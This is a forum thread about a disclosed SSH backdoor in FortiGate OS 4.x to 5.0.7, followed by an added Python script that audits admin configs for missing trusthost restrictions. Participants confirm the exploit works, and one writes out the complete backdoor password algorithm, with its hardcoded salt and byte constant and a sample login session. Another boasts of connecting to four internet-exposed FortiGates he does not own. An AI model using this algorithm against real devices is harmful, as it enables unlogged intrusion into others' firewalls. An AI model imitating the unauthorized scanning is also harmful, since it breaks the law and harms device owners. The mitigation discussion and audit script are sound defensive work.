MikeU
New Contributor

SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7

http://seclists.org/fulldisclosure/2016/Jan/26

I have not had a chance to try this. I don't see any threads discussing it. So, I thought I'd share.

=Mike

deepakmime
New Contributor

Are there any comments from the Fortinet technical team on it? Very keen to know.

The guy here on Twitter confirms that he has the backdoor working:

https://twitter.com/esizkur

djwilliams

I have tried the script out there and have not been able to get it to work. Until we get some answer from Fortinet I'm going to keep at it.

Network Engineer
Stan

Tried it on a 5.0.7 version and it works.

The script logs in without any password prompt.

neonbit
Valued Contributor

Confirming the script works. I just tested on a fresh FGVM running 5.0.6 and it logs in automatically...

~/Desktop $ ./fgt_ssh_backdoor.py 192.168.100.200
FortiGate-VM64 # get sys status
Version: FortiGate-VM64 v5.0,build0271,140124 (GA Patch 6)
Virus-DB: 16.00560(2012-10-19 08:31)
Extended DB: 1.00000(2012-10-17 15:46)
IPS-DB: 4.00345(2013-05-23 00:39)
IPS-ETDB: 0.00000(2001-01-01 00:00)
Serial-Number: FGVMEV0000000000

neonbit
Valued Contributor

I just did a quick search for FortiGates online running SSH and after 10 minutes was able to connect to 4... this is going to hurt some people methinks...

I noticed that there is no log saved for the actual SSH connection from the script. The only time I was able to see a log entry was when I changed the config (user: Fortimanager_Access).

localhost

Thanks for sharing Mike.

I've got mixed results. This one works:

Version: FortiGate-VM64 v5.0,build0128,121101 (GA)

But I was unable to access my FG-111C:

Fortigate-111C v4.0,build0639,120906 (MR3 Patch 10)

Don't know... maybe it's because I did a downgrade from 5.2. Or they have different salts.

For those who don't want to dig too deep into this, this is all the magic:

If you connect to SSH with the user 'Fortimanager_Access' you'll receive a challenge.

Then you can calculate the dynamic password based on this dword challenge:

n = $SSH_Challenge
m = $SHA1_Generator

 

m.add('\x00' * 12)
m.add(n + 'FGTAbc11*xy+Qqz27')
m.add('\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70')
$Dynamic_Password = 'AK1' + base64.b64encode('\x00' * 12 + m.sha1digest())

 

 

Putty:

login as: Fortimanager_Access
Using keyboard-interactive authentication. -840056459
Access denied
Using keyboard-interactive authentication. -1914958026
Access denied
Using keyboard-interactive authentication. -1378285763
AK1AAAAAAAAAAAAAAAAmWT0TKGMI23Iq4Q9P42z0PwpYBQ=
FortiGate-VM64 #

This only works if you have SSH access. So by limiting the IP ranges for all admin users, you can mitigate the threat.

emnoc
Esteemed Contributor III

If you enable an SSH key it seems like it results in a fix. Can anybody confirm this on their FGT? (Upload an SSH key from the CLI and retest.)

PCNSE
NSE
StrongSwan

localhost

Like this?

login as: admin
Authenticating with public key "rsa-key-20160113"

FortiGate-VM64 # conf sys admin

FortiGate-VM64 (admin) # show
config system admin
    edit "admin"
        set accprofile "super_admin"
        set vdom "root"
        set ssh-public-key1 "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArnvrfeRc/Dp29mYq6Yp4YqHSYzvdsGiwvt5I+5PiQKACosqED4L6OApvXBtEsJz7XMJct9cADHxgajn2UrxDUxgjec3/4NVYkq9/jHm1X0y5MbgLb5X2ftDQNqM3gzO2vk6ZRCN9kyq4oCs0V2ynZYnjp8Q8/pRYAm/Y4DhE8s+SZKhDHNq6R3q4wc9IPWgAiWSGCsaPPGH2+3cYlvwQRDyva5RsWZPz4WhLm33A+/rl+4CBXY70mlPuXN3xvps9IGTb0yYA0H03tfGbKxaQdEArFe4nh30b8gTZALtWJ3lNE1Y8oq3zVYrnfDIzmtNsCY/NnaSKi9bQMH0TcRjEUQ== rsa-key-20160113"
        config dashboard-tabs
            <snip>
        end
        config dashboard
            <snip>
        end
        set password ENC AK1nds6rsH4pi3VuVI9jjtvaXR1fZjp5v8Stds1F03wrqA=
    next
end

FortiGate-VM64 (admin) #

Still able to access with the FortiManager user.
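The mitigation localhost describes earlier in the thread (limit every admin user to trusted IP ranges) and the follow-up above, which shows that an SSH public key on the admin account does not stop the Fortimanager_Access login, both come down to one configuration check: does each entry in config system admin carry trusthost restrictions? The script below is an added example written for this thread, not code posted by anyone here and not Fortinet's tooling. It parses the text of a FortiOS config system admin block, as printed by show, and flags admin entries that are reachable from any source address. The sample config is constructed; the key and password values in it are placeholders. Plain show omits default values and only show full-configuration prints the default set trusthost1 0.0.0.0 0.0.0.0, so the script treats a missing trusthost and an all-zero one the same way. The ssh-public-key lines are parsed only so the finding can say an SSH key is present without counting it as a mitigation.

```python
import re
from dataclasses import dataclass, field

# Constructed sample, modelled on the "show" output posted in the thread.
# "admin" has no trusthost lines (unrestricted); "netops" is locked to two
# sources. Key and password values are placeholders, not real material.
SAMPLE_CONFIG = """\
config system admin
    edit "admin"
        set accprofile "super_admin"
        set vdom "root"
        set ssh-public-key1 "ssh-rsa AAAAB3EXAMPLEKEY== rsa-key-20160113"
        config dashboard
            edit 1
                set name "System Information"
            next
        end
        set password ENC AK1EXAMPLEPLACEHOLDER=
    next
    edit "netops"
        set trusthost1 10.10.0.0 255.255.255.0
        set trusthost2 192.168.100.5 255.255.255.255
        set accprofile "prof_admin"
        set vdom "root"
        set password ENC AK1EXAMPLEPLACEHOLDER=
    next
end
"""


@dataclass
class AdminEntry:
    name: str
    trusthosts: list = field(default_factory=list)  # (ip, mask) pairs
    has_ssh_key: bool = False


def parse_system_admin(text):
    """Parse a 'config system admin' block into AdminEntry objects.

    Only the keys the audit needs are read. Nested 'config ... end'
    sub-blocks (dashboard, dashboard-tabs, ...) are skipped so that their
    own 'edit'/'next'/'set' lines are not mistaken for admin settings.
    """
    admins = []
    current = None
    depth = 0  # nesting depth of sub-blocks inside the current admin entry
    for raw in text.splitlines():
        line = raw.strip()
        if current is None:
            m = re.match(r'edit "([^"]+)"', line)
            if m:
                current = AdminEntry(name=m.group(1))
            continue  # top-level 'config system admin' / 'end' lines
        if line.startswith("config "):
            depth += 1
            continue
        if line == "end" and depth > 0:
            depth -= 1
            continue
        if depth > 0:
            continue
        if line == "next":
            admins.append(current)
            current = None
            continue
        m = re.match(r"set trusthost\d+ (\S+) (\S+)", line)
        if m:
            current.trusthosts.append((m.group(1), m.group(2)))
            continue
        if re.match(r"set ssh-public-key\d+ ", line):
            current.has_ssh_key = True
    return admins


def audit(admins):
    """Return (name, note) findings for admins reachable from any address.

    No trusthost line (default hidden by 'show') and an explicit
    0.0.0.0 0.0.0.0 both mean unrestricted. An SSH key is reported but,
    as the thread shows, it does not block the Fortimanager_Access login.
    """
    findings = []
    for a in admins:
        unrestricted = not a.trusthosts or any(
            ip == "0.0.0.0" and mask == "0.0.0.0" for ip, mask in a.trusthosts
        )
        if unrestricted:
            note = "no trusthost restriction"
            if a.has_ssh_key:
                note += " (SSH key present, but that does not mitigate this issue)"
            findings.append((a.name, note))
    return findings


def audit_config(text):
    """Convenience wrapper: parse the config text and audit it."""
    return audit(parse_system_admin(text))


if __name__ == "__main__":
    for name, note in audit_config(SAMPLE_CONFIG):
        print(f"{name}: {note}")
```

Feed it the output of show (or show full-configuration) from config system admin; every admin it lists should get trusthost entries covering only the management networks, and admins that are not needed should be removed rather than merely restricted.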